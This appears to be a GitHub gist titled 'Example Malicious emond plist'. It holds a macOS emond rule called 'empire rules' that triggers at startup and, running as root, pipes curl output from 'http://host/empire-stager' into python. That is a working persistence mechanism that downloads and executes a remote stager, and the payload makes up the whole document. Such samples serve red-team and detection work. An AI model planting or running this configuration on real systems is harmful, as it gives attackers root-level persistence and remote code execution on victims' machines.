Example Malicious emond plist
<?xml version="1.0" encoding="UTF-8"?> | |
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> | |
<plist version="1.0"> | |
<array> | |
<dict> | |
<key>name</key> | |
<string>empire rules</string> | |
<key>enabled</key> | |
<true/> | |
<key>eventTypes</key> | |
<array> | |
<string>startup</string> | |
</array> | |
<key>actions</key> | |
<array> | |
<dict> | |
<key>command</key> | |
<string>/bin/sleep</string> | |
<key>user</key> | |
<string>root</string> | |
<key>arguments</key> | |
<array> | |
<string>10</string> | |
</array> | |
<key>type</key> | |
<string>RunCommand</string> | |
</dict> | |
<dict> | |
<key>command</key> | |
<string>/bin/bash</string> | |
<key>user</key> | |
<string>root</string> | |
<key>arguments</key> | |
<array> | |
<string>-c</string> | |
<string>curl 'http://host/empire-stager' | python &</string> | |
</array> | |
<key>type</key> | |
<string>RunCommand</string> | |
</dict> | |
</array> | |
</dict> | |
</array> | |
</plist> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment